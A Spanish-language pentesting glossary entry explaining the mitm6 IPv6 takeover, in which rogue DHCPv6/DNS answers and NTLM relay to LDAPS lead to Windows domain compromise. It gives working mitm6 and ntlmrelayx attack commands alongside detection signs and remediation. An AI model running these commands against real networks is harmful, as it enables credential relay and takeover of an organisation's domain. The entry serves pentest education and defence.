> ## Documentation Index
> Fetch the complete documentation index at: https://rootea.es/llms.txt
> Use this file to discover all available pages before exploring further.

# mitm6 — IPv6 takeover

> Windows hace DHCPv6 al boot incluso en redes sin IPv6.

# mitm6 — IPv6 takeover

<p className="glossary-answer">Windows hace DHCPv6 al boot incluso en redes sin IPv6.</p>

**Categoría:** [Reconocimiento](/glosario)

🎯 **Trinchera** — Windows hace DHCPv6 al boot incluso en redes sin
IPv6. `mitm6` (Dirk-jan Mollema) responde rápidamente, asignando IP
IPv6 al cliente y configurándose como **DNS server**. Combinado con
`ntlmrelayx` y WPAD spoofing → captura/relay de NTLM al DC →
**compromiso total de dominio en 30 min**.

🔗 **Kill chain** — `mitm6 -i eth0 -d corp.local` + `ntlmrelayx -t
ldaps://dc01 --delegate-access --escalate-user attacker` →
**RBCD escalation** → SYSTEM en cualquier host.
[Resecurity walkthrough](https://www.resecurity.com/blog/article/mitm6-ntlm-relay-how-ipv6-auto-configuration-leads-to-full-domain-compromise).

📡 **Huella defensiva** — DHCPv6 desde IP no router; volumen de
NTLM auths anómalas hacia un mismo host; AzureATP / Defender for
Identity detecta el patrón.

⚠️ **Falso amigo** — Funciona incluso si la red **no usa IPv6** —
porque Windows lo prefiere si recibe ofertas.

🛡️ **Remediación** — Bloquear DHCPv6 outbound vía Windows Firewall
GPO si IPv6 no se usa internamente. LDAP signing + channel binding
obligatorio para mitigar el relay a LDAPS.

```bash theme={null}
mitm6 -d corp.local
impacket-ntlmrelayx -6 -t ldaps://10.0.0.10 --delegate-access \
  --escalate-user attacker
```

***

← [Volver al glosario completo](/glosario)

<script type="application/ld+json">
  {`{"@context":"https://schema.org","@type":"DefinedTerm","name":"mitm6 — IPv6 takeover","description":"Windows hace DHCPv6 al boot incluso en redes sin IPv6.","inDefinedTermSet":{"@type":"DefinedTermSet","name":"Glosario táctico de pentesting","url":"https://rootea.es/glosario"},"url":"https://rootea.es/glosario/mitm6-ipv6-takeover"}`}
</script>

<script type="application/ld+json">
  {`{"@context":"https://schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"Inicio","item":"https://rootea.es"},{"@type":"ListItem","position":2,"name":"Glosario táctico","item":"https://rootea.es/glosario"},{"@type":"ListItem","position":3,"name":"mitm6 — IPv6 takeover","item":"https://rootea.es/glosario/mitm6-ipv6-takeover"}]}`}
</script>

*Última actualización: 2026-06-11*
